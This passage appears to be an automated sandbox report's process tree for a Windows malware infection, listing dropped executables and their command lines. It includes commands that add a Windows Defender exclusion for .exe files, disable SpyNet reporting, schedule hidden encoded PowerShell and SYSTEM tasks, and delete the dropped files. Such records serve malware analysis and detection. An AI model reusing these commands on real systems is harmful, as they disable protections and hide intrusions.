    - - C:\Users\Admin\Pictures\8LLU7PPBYQahgWXvQjPS9z7g.exe
        
        "C:\Users\Admin\Pictures\8LLU7PPBYQahgWXvQjPS9z7g.exe"
        5⤵
        
        PID:5352
    - - C:\Users\Admin\Pictures\74BNg5VyK1v6BOVgHkSsyAzR.exe
        
        "C:\Users\Admin\Pictures\74BNg5VyK1v6BOVgHkSsyAzR.exe"
        5⤵
        
        PID:10128
      - C:\Users\Admin\AppData\Local\Temp\7zSB99E.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:9984
        
        C:\Users\Admin\AppData\Local\Temp\7zSC6BE.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:9592
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:3864
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:10592
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:9832
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:11232
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:9536
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:10804
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:4820
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gQldbGCrI" /SC once /ST 00:49:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:10892
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gQldbGCrI"
        8⤵
        
        PID:7940
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gQldbGCrI"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2556
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WSnNoIk.exe\" 3Y /lbsite_idANP 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:6888
    - - C:\Users\Admin\Pictures\YPD7KXXcsiKK4tzsPhQ7jVAL.exe
        
        "C:\Users\Admin\Pictures\YPD7KXXcsiKK4tzsPhQ7jVAL.exe"
        5⤵
        
        PID:10472
    - - C:\Users\Admin\Pictures\zcjB3yfmVSgEyFOTRcNJb5O7.exe
        
        "C:\Users\Admin\Pictures\zcjB3yfmVSgEyFOTRcNJb5O7.exe"
        5⤵
        
        PID:348
    - - C:\Users\Admin\Pictures\XME5mMBQkeOTe1cTU89zJLc7.exe
        
        "C:\Users\Admin\Pictures\XME5mMBQkeOTe1cTU89zJLc7.exe" --silent --allusers=0
        5⤵
        
        PID:6856
      - C:\Users\Admin\Pictures\XME5mMBQkeOTe1cTU89zJLc7.exe
        
        C:\Users\Admin\Pictures\XME5mMBQkeOTe1cTU89zJLc7.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67748538,0x67748548,0x67748554
        6⤵
        
        PID:7708
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XME5mMBQkeOTe1cTU89zJLc7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XME5mMBQkeOTe1cTU89zJLc7.exe" --version
        6⤵
        
        PID:5236
    - - C:\Users\Admin\Pictures\aTUhIfCDlkIz58mPTomJbMux.exe
        
        "C:\Users\Admin\Pictures\aTUhIfCDlkIz58mPTomJbMux.exe"
        5⤵
        
        PID:9732
    - - C:\Users\Admin\Pictures\VnTeqAFY01wIIfgFs39Erdbi.exe
        
        "C:\Users\Admin\Pictures\VnTeqAFY01wIIfgFs39Erdbi.exe"
        5⤵
        
        PID:11196
    - - C:\Users\Admin\Pictures\Tvxse8CCNZmWMg2WbxHMQp3X.exe
        
        "C:\Users\Admin\Pictures\Tvxse8CCNZmWMg2WbxHMQp3X.exe"
        5⤵
        
        PID:2108
    - - C:\Users\Admin\Pictures\Z2mCYuB33wzv12QXjyfUM8g7.exe
        
        "C:\Users\Admin\Pictures\Z2mCYuB33wzv12QXjyfUM8g7.exe"
        5⤵
        
        PID:8204
    - - C:\Users\Admin\Pictures\iX5AbkK9UFZsXIG40ug9GthI.exe
        
        "C:\Users\Admin\Pictures\iX5AbkK9UFZsXIG40ug9GthI.exe"
        5⤵
        
        PID:6900
      - C:\Users\Admin\AppData\Local\Temp\7zS19AD.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:10116
        
        C:\Users\Admin\AppData\Local\Temp\7zS2B02.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:6620
- - C:\Users\Admin\AppData\Local\Temp\a\Ads.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Ads.exe"
    3⤵
    PID:6260
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:6280
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
      4⤵
      PID:6296
    - - C:\Users\Admin\Pictures\5NH3PO4cyVE9Nn4VOdvPUs6D.exe
        
        "C:\Users\Admin\Pictures\5NH3PO4cyVE9Nn4VOdvPUs6D.exe"
        5⤵
        
        PID:5348
    - - C:\Users\Admin\Pictures\HkTPqKXAwJU1OHKdukTdYUZJ.exe
        
        "C:\Users\Admin\Pictures\HkTPqKXAwJU1OHKdukTdYUZJ.exe"
        5⤵
        
        PID:6292
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10176
      - C:\Users\Admin\Pictures\HkTPqKXAwJU1OHKdukTdYUZJ.exe
        
        "C:\Users\Admin\Pictures\HkTPqKXAwJU1OHKdukTdYUZJ.exe"
        6⤵
        
        PID:3980
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:11248
    - - C:\Users\Admin\Pictures\SYU55U4PImTWaaOOsjruHQQQ.exe
        
        "C:\Users\Admin\Pictures\SYU55U4PImTWaaOOsjruHQQQ.exe"
        5⤵
        
        PID:6508
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6852
      - C:\Users\Admin\Pictures\SYU55U4PImTWaaOOsjruHQQQ.exe
        
        "C:\Users\Admin\Pictures\SYU55U4PImTWaaOOsjruHQQQ.exe"
        6⤵
        
        PID:9836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:3496
    - - C:\Users\Admin\Pictures\EYA3WTiU4ykV30AfAkOmfLn7.exe
        
        "C:\Users\Admin\Pictures\EYA3WTiU4ykV30AfAkOmfLn7.exe" --silent --allusers=0
        5⤵
        
        PID:6728
      - C:\Users\Admin\Pictures\EYA3WTiU4ykV30AfAkOmfLn7.exe
        
        C:\Users\Admin\Pictures\EYA3WTiU4ykV30AfAkOmfLn7.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x294,0x2b8,0x2bc,0x290,0x2c0,0x69548538,0x69548548,0x69548554
        6⤵
        
        PID:1416
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\EYA3WTiU4ykV30AfAkOmfLn7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\EYA3WTiU4ykV30AfAkOmfLn7.exe" --version
        6⤵
        
        PID:3496
    - - C:\Users\Admin\Pictures\j0eHnHErmWgUwt5CJ63yLG1g.exe
        
        "C:\Users\Admin\Pictures\j0eHnHErmWgUwt5CJ63yLG1g.exe"
        5⤵
        
        PID:6668
    - - C:\Users\Admin\Pictures\tRG31tQ1LHgjQleczUaHexF6.exe
        
        "C:\Users\Admin\Pictures\tRG31tQ1LHgjQleczUaHexF6.exe"
        5⤵
        
        PID:7144
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\tRG31tQ1LHgjQleczUaHexF6.exe" & exit
        6⤵
        
        PID:6604
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:7140
    - - C:\Users\Admin\Pictures\i3yZzOSUKJIupBIBUeEUFPqm.exe
        
        "C:\Users\Admin\Pictures\i3yZzOSUKJIupBIBUeEUFPqm.exe"
        5⤵
        
        PID:5640
      - C:\Users\Admin\AppData\Local\Temp\7zSD414.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:5236
        
        C:\Users\Admin\AppData\Local\Temp\7zSD7DD.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:3192
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:3324
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:5252
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:8836
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:3012
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:6568
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:8236
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:1036
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gmIzCFLaO" /SC once /ST 07:50:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:4876
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gmIzCFLaO"
        8⤵
        
        PID:7648
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gmIzCFLaO"
        8⤵
        
        PID:7696
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\yhYboTc.exe\" 3Y /sHsite_idDgU 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:6904
    - - C:\Users\Admin\Pictures\mfty3zjCkKUE0Tqq1dcliQEP.exe
        
        "C:\Users\Admin\Pictures\mfty3zjCkKUE0Tqq1dcliQEP.exe"
        5⤵
        
        PID:8204
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:9588
      - C:\Users\Admin\Pictures\mfty3zjCkKUE0Tqq1dcliQEP.exe
        
        "C:\Users\Admin\Pictures\mfty3zjCkKUE0Tqq1dcliQEP.exe"
        6⤵
        
        PID:4200
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5908
    - - C:\Users\Admin\Pictures\1ToTRfXko7MIck5WAnMhU5Tg.exe
        
        "C:\Users\Admin\Pictures\1ToTRfXko7MIck5WAnMhU5Tg.exe"
        5⤵
        
        PID:4544
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:10712
      - C:\Users\Admin\Pictures\1ToTRfXko7MIck5WAnMhU5Tg.exe
        
        "C:\Users\Admin\Pictures\1ToTRfXko7MIck5WAnMhU5Tg.exe"
        6⤵
        
        PID:5092
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:10804
    - - C:\Users\Admin\Pictures\ECq8hZXiqAemyPd4IVJGPm6X.exe
        
        "C:\Users\Admin\Pictures\ECq8hZXiqAemyPd4IVJGPm6X.exe"
        5⤵
        
        PID:8260
    - - C:\Users\Admin\Pictures\QEHzkLi6MvPh3WRqrf7IeY1C.exe
        
        "C:\Users\Admin\Pictures\QEHzkLi6MvPh3WRqrf7IeY1C.exe" --silent --allusers=0
        5⤵
        
        PID:4276
      - C:\Users\Admin\Pictures\QEHzkLi6MvPh3WRqrf7IeY1C.exe
        
        C:\Users\Admin\Pictures\QEHzkLi6MvPh3WRqrf7IeY1C.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x67748538,0x67748548,0x67748554
        6⤵
        
        PID:8296
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QEHzkLi6MvPh3WRqrf7IeY1C.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\QEHzkLi6MvPh3WRqrf7IeY1C.exe" --version
        6⤵
        
        PID:5140
    - - C:\Users\Admin\Pictures\MuGSMXBnaCiqfWgPhBD3IlCU.exe
        
        "C:\Users\Admin\Pictures\MuGSMXBnaCiqfWgPhBD3IlCU.exe"
        5⤵
        
        PID:7084
    - - C:\Users\Admin\Pictures\7uymXTutBpVjYp45EOmNGlL5.exe
        
        "C:\Users\Admin\Pictures\7uymXTutBpVjYp45EOmNGlL5.exe"
        5⤵
        
        PID:3668
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\7uymXTutBpVjYp45EOmNGlL5.exe" & exit
        6⤵
        
        PID:10852
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        7⤵
        Delays execution with timeout.exe
        
        PID:6524
    - - C:\Users\Admin\Pictures\6WsivCfP7de2xLnbSTbMfqTg.exe
        
        "C:\Users\Admin\Pictures\6WsivCfP7de2xLnbSTbMfqTg.exe"
        5⤵
        
        PID:5412
      - C:\Users\Admin\AppData\Local\Temp\7zS81D5.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:8280
        
        C:\Users\Admin\AppData\Local\Temp\7zS87B1.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:3940
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        8⤵
        
        PID:10272
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        9⤵
        
        PID:10676
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        10⤵
        
        PID:10972
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        10⤵
        
        PID:11100
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        8⤵
        
        PID:10340
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        9⤵
        
        PID:10628
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        10⤵
        
        PID:10664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        10⤵
        
        PID:10756
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gmtaiTEmw" /SC once /ST 02:35:25 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        8⤵
        Creates scheduled task(s)
        
        PID:10796
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gmtaiTEmw"
        8⤵
        
        PID:11132
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gmtaiTEmw"
        8⤵
        
        PID:10324
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 09:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\VqXaIPc.exe\" 3Y /Upsite_idmxV 385118 /S" /V1 /F
        8⤵
        Creates scheduled task(s)
        
        PID:10696
    - - C:\Users\Admin\Pictures\oFzmEIfGyyMtwdWBC283dQ80.exe
        
        "C:\Users\Admin\Pictures\oFzmEIfGyyMtwdWBC283dQ80.exe"
        5⤵
        
        PID:9700
    - - C:\Users\Admin\Pictures\lXZq7SKU5tPRsxlcZ601u5Og.exe
        
        "C:\Users\Admin\Pictures\lXZq7SKU5tPRsxlcZ601u5Og.exe"
        5⤵
        
        PID:10740
    - - C:\Users\Admin\Pictures\2r0pEkewvnntvP35jQWyvplv.exe
        
        "C:\Users\Admin\Pictures\2r0pEkewvnntvP35jQWyvplv.exe"
        5⤵
        
        PID:8260
    - - C:\Users\Admin\Pictures\IBEo9OV7hGj0uFofh4KbbHs9.exe
        
        "C:\Users\Admin\Pictures\IBEo9OV7hGj0uFofh4KbbHs9.exe"
        5⤵
        
        PID:8164
    - - C:\Users\Admin\Pictures\qTr4pMy408OHugFjVoNvVHOY.exe
        
        "C:\Users\Admin\Pictures\qTr4pMy408OHugFjVoNvVHOY.exe" --silent --allusers=0
        5⤵
        
        PID:11200
      - C:\Users\Admin\Pictures\qTr4pMy408OHugFjVoNvVHOY.exe
        
        C:\Users\Admin\Pictures\qTr4pMy408OHugFjVoNvVHOY.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x65ee8538,0x65ee8548,0x65ee8554
        6⤵
        
        PID:8704
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qTr4pMy408OHugFjVoNvVHOY.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\qTr4pMy408OHugFjVoNvVHOY.exe" --version
        6⤵
        
        PID:1856
    - - C:\Users\Admin\Pictures\okjR7my1fV6I6gMvAASo0cpV.exe
        
        "C:\Users\Admin\Pictures\okjR7my1fV6I6gMvAASo0cpV.exe"
        5⤵
        
        PID:8716
    - - C:\Users\Admin\Pictures\SFfr2kRk2SNHAbsPO8E61dEk.exe
        
        "C:\Users\Admin\Pictures\SFfr2kRk2SNHAbsPO8E61dEk.exe"
        5⤵
        
        PID:8848
      - C:\Users\Admin\AppData\Local\Temp\7zS38BE.tmp\Install.exe
        
        .\Install.exe
        6⤵
        
        PID:7356
        
        C:\Users\Admin\AppData\Local\Temp\7zS39D7.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        7⤵
        
        PID:11120
- - C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
    "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
    3⤵
    PID:6460
  - - C:\Users\Admin\AppData\Local\Temp\a\sogn.exe
      "C:\Users\Admin\AppData\Local\Temp\a\sogn.exe"
      4⤵
      PID:7828
- - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
    "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
    3⤵
    PID:6640
  - - C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe
      "C:\Users\Admin\AppData\Local\Temp\a\arinzezx.exe"
      4⤵
      PID:7992
- - C:\Users\Admin\AppData\Local\Temp\a\abun.exe
    "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
    3⤵
    PID:6748
  - - C:\Users\Admin\AppData\Local\Temp\a\abun.exe
      "C:\Users\Admin\AppData\Local\Temp\a\abun.exe"
      4⤵
      PID:7868
- - C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe
    "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe"
    3⤵
    PID:7108
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\timeSync.exe" & del "C:\ProgramData\*.dll"" & exit
      4⤵
      PID:3868
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        5⤵
        Delays execution with timeout.exe
        
        PID:9208
- - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
    "C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe"
    3⤵
    PID:6164
  - - C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
      C:\Users\Admin\AppData\Local\Temp\a\Qconngovaq.exe
      4⤵
      PID:8940
- - C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\a\PO.pdf.exe"
    3⤵
    PID:5508
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
      4⤵
      PID:4928
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PO.exe"
        5⤵
        
        PID:4936
- - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
    "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
    3⤵
    PID:6256
  - - C:\Users\Admin\AppData\Local\Temp\a\raaa.exe
      "C:\Users\Admin\AppData\Local\Temp\a\raaa.exe"
      4⤵
